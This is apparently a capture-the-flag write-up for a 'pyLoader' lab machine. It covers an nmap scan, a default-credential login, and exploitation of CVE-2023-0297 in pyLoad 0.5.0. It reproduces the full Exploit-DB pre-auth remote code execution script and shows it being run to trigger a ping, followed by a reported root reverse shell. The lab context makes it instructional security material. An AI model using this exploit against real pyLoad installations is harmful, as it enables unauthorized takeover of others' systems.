pyLoader

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.194.26 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-14 09:22 +08
Nmap scan report for 192.168.194.26
Host is up (0.0067s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
9666/tcp open  http    CherryPy wsgiserver
|_http-server-header: Cheroot/8.6.0
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: Login - pyLoad 
|_Requested resource was /login?next=http://192.168.194.26:9666/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.55 seconds

Initial Access

Port 9666

After looking at the nmap results, we will first look at port 9666.

After searching online on what this service does, we can see this.

After going into the webpage, it will bring us to a login page.

We can try the usual password but it does not work. However searching online if there is any default credentials, turns out there are default credential for this service.

After login in using those credentials, we are at this page.

When we click on info on the top right corner of the webpage, we can see the version of the OS, python and pyLoad that the service is using.

CVE-2023-0297

After searching online for any potential exploit for pyLoad, there is 1 result that was returned.

It was a pre-auth RCE exploit.

PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)Exploit Database

We will first download the payload

$ searchsploit -m 51532            
  Exploit: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/51532
     Path: /usr/share/exploitdb/exploits/python/webapps/51532.py
    Codes: CVE-2023-0297
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/ranay/Desktop/PG/pyLoader/51532.py

The content of the exploit is shown below

# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297

import requests, argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()

def doRequest(url):
    try:
        res = requests.get(url + '/flash/addcrypted2')
        if res.status_code == 200:
            return True
        else:
            return False

    except requests.exceptions.RequestException as e:
        print("[!] Maybe the host is offline :", e)
        exit()

def runExploit(url, cmd):
    endpoint = url + '/flash/addcrypted2'
    if " " in cmd:
        validCommand = cmd.replace(" ", "%20")
    else:
        validCommand = cmd

    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)
    print('[+] The exploit has be executeded in target machine. ')

def main(targetUrl, Command):
    print('[+] Check if target host is alive: ' + targetUrl)
    alive = doRequest(targetUrl)
    if alive == True:
        print("[+] Host up, let's exploit! ")
        runExploit(targetUrl,Command)
    else:
        print('[-] Host down! ')

if(arguments.url != None and arguments.cmd != None):
    targetUrl = arguments.url
    Command = arguments.cmd
    main(targetUrl, Command)

We will test if the exploit is working.

First, we will run this to watch for the traffic. (tun0 is my interface for vpn, might be different from others)

sudo tcpdump -i tun0

Then, we will execute the exploit

python 51532.py -u http://192.168.194.26:9666 -c 'ping 192.168.45.215'

We can see the ICMP echo request and reply. This means the exploit is working as intended.

So, now we will try to call a reverse shell using that exploit.

After a while, we got back a reverse shell.

This shell just so happens to be root also.